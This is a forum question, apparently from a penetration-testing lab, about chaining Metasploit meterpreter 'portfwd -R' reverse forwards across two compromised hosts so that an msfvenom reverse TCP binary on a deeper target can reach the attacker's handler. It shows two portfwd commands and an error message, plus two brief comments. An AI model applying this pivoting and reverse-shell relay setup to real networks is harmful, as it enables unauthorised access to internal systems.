0

I'm having an issue pivoting with meterpreter and portfwd and I am starting to wonder if what I am trying to do is even possible. My attacker (we'll say 10.80.6.3) machine has a shell on victim 1 and I have added a route to victim 2 machine which is in a different subnet. I managed to get a shell on victim 2 and in my enumeration discovered another target in a different subnet. I have added a new route through my second meterpreter session for this newly discovered subnet. I cannot initiate an attack on the target from victim2, victim 1 or my attacker machine so I am left with dropping a msfvenom reverse tcp binary on the target through a limited shell I have and executing the binary.

My issue lies in that I cannot properly get reverse port forwarding to work for me. I'm trying to use portfwd command in metasploit like so

In session 2 where I am 172.16.2.2. Adds successfully

portfwd add -R -L 192.168.10.3 -l 9001 -p 9001   # forward port 9001 on 192.168.10.3 to 172.16.2.2

In session 1 where I am 192.168.10.3. Fails to add.

portfwd add -R -L 10.80.6.3 -l 9001 -p 9001   # forward port 9001 on attacker(10.80.6.3) to 192.168.10.3

In the second portfwd command I get the error "Failed to create relay: core_channel_open: Operation failed: 1."

So I believe this is complaining about port 9001 being open. Looking at netstat, my attack ip is listening on port 9001 for metasploit which makes me think that metasploit is using the remote host, the unspecified -r, in the portfwd command as my machine's localhost. If that's true, than does that mean that only the route from victim 1 could be used with remote port forwarding to my machine and traffic from victim 2 to victim 1 has to be done with something like chisel?

Also, I am setting the LHOST in my reverse payload that is ran on "Target" to victim2's ip and port 9001. My thought was that I would have a chain of 9001 listening ports all feeding the traffic from my msfvenom binary on the target to my attacker machine where my exploit handler is waiting on 9001. Seems simple enough.

I would appreciate any help here and can certainly provide more info if needed. Thank you

Pivoting

UCProgrammer
  • 113
  • 6
  • Are you sure 9001 is not bound on the target? – multithr3at3d Aug 08 '20 at 14:08
  • Yea it wasn't bound. There was another port on the machine with a web server running as well on localhost which I tried to use chisel to reverse port forward out and I had no errors from chisel but a port wasn't opened on my chisel server machine (victim 2) for that forwarded port – UCProgrammer Aug 09 '20 at 13:44

0 Answers0